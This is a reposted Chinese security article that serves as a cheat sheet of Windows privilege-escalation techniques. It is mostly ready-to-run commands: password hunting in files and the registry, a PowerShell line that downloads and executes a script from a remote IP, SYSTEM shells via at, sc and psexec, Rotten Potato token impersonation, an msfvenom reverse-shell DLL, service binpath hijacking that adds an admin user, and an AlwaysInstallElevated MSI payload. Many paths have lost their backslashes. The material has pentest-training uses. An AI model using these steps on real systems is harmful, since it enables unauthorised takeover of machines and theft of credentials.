利用敏感信息提权
C:WindowsPanther
C:WindowsPantherUnattend
C:WindowsSystem32
C:WindowsSystem32sysprep
C:UsersuserDesktop> dir C:*vnc.ini /s /b /c
C:UsersuserDesktop> dir C: /s /b /c | findstr /sr password
C:UsersuserDesktop>findstr /si password *.txt | *.xml | *.ini
reg query HKLM /f password /t REG_SZ /sreg query HKCU /f password /t REG_SZ /s
利用脚本查找系统潜在漏洞
python2 windows-exploit-suggester.py --update
systeminfo > sysinfo.txt
python2 windows-exploit-suggester.py -d 2020-08-20-mssb.xls -i sysinfo.txt
powershell -exec bypass -c IEX(New-Object Net.WebClient).DownloadString('http://39.xxx.xxx.210/Sherlock.ps1'); // 远程执行
Import-Module 目录Sherlock.ps1 本地执行
Find-AllVulns // 调用脚本后,执行搜索命令
use post/multi/recon/local_exploit_suggester
set session 1
exploit
use post/windows/gather/enum_patches
set session 1
exploit
-
Windows 下的提权大合集:https://github.com/lyshark/Windows-exploits -
Windows内核溢出漏洞提权大全:https://github.com/SecWiki/windows-kernel-exploits -
各大平台提权工具:https://github.com/klsfct/getshell
AT本地提权
#at命令提权
C:Documents and Settingskevin>cd
C:>at -? #查看命令参数
C:>at 2:15 /interactive cmd #未来时间(如延后1min),会到点以system启动cmd
Added a new job with job ID = 1
C:>at
Status ID Day Time Command Line
---------------------------------------------------------------------
1 Today 2:15 AM cmd
此时,到设置的时间点2:15会以system权限打开一个cmd
SC本地提权
C:>sc Create syscmd binPath= “cmd /K start” type= own type= interact #配置一个服务syscmd
C:>sc start syscmd #启动服务获取system权限的cmd
PS本地提权
psexec.exe -accepteula -s -i -d cmd.exe
烂土豆提权
欺骗 “NT AUTHORITYSYSTEM”账户通过NTLM认证到我们控制的TCP终端。
对这个认证过程使用中间人攻击(NTLM重放),为“NT AUTHORITYSYSTEM”账户本地协商一个安全令牌。这个过程是通过一系列的Windows API调用实现的。
模仿这个令牌。只有具有“模仿安全令牌权限”的账户才能去模仿别人的令牌。一般大多数的服务型账户(IIS、MSSQL等)有这个权限,大多数用户级的账户没有这个权限。
meterpreter > getprivs
##或者服务器的cmd下键入以下命令
whoami /all
whoami /priv
upload /root/potato.exe C:UsersPublic
cd C:\Users\Public
use incognito
list_tokens -u
execute -cH -f ./potato.exe
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
Dll劫持提权
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.134 lport=6677 -f dll >./payload.dll
Windows服务带有易受攻击的权限一
“shutdown -r -t 0”
命令,使其主机重启即可,在此之前我们需要先在kali上启用一个监听,用于接收反弹shell的会话。Windows服务带有易受攻击的权限二
accesschk.exe -uwcqv "username" * //检测当前用户或者用户组是否有可以修改的服务,根据实际情况修改username
sc config "ServiceName" binpath="net user eviladmin P4ssword0 /add" //添加一个用户
//在修改了binpath的值后,用“sc stop”和“sc start”命令重启服务:
sc stop"ServiceName"//关闭服务
sc start "ServiceName" //启动服务
Trusted Service Paths 提权漏洞
路径没有包含在引号中,服务会按照以下顺序依次执行
c:program.exe
c:program files.exe
c:program files (x86)grasssoftmacro.exe
c:program files (x86)grasssoftmacro expertMacroService.exe
使用以下命令查看系统中错误配置的路径
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:Windows\" |findstr /i /v """
sc stop <service_name>
sc start <service_name>
“shutdown -r -t 0”
命令让他重启就行了。exploit/windows/local/unquoted_service_path
,使用如下:use exploit/windows/local/unquoted_service_path
set session 1
set AutoRunScript migrate -f
exploit
AlwaysInstallElevated提权漏洞
[HKEY_CURRENT_USERSOFTWAREPoliciesMicrosoftWindowsInstaller]
“AlwaysInstallElevated”=dword:00000001
[HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller]
“AlwaysInstallElevated”=dword:00000001
reg query HKCUSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated
reg query HKLMSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o rotten.msi
计算机设置管理模版windows组件windows installer
,选中已启用即可,该操作需要管理员权限。reg add HKCUSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated /t REG_DWORD /d 1
reg add HKLMSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated /t REG_DWORD /d 1
-
SeRestorePrivilege -
SeTakeOwnershipPrivilege
参考资料:https://blog.csdn.net/weixin_44032232/article/details/114366001
https://www.anquanke.com/post/id/225911
https://xz.aliyun.com/t/2606
https://www.anquanke.com/post/id/85377
https://blog.csdn.net/qq_41874930/article/details/109624274
侵权请私聊公众号删文
原文始发于微信公众号(纵横安全圈):Window常见提权方法一览
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论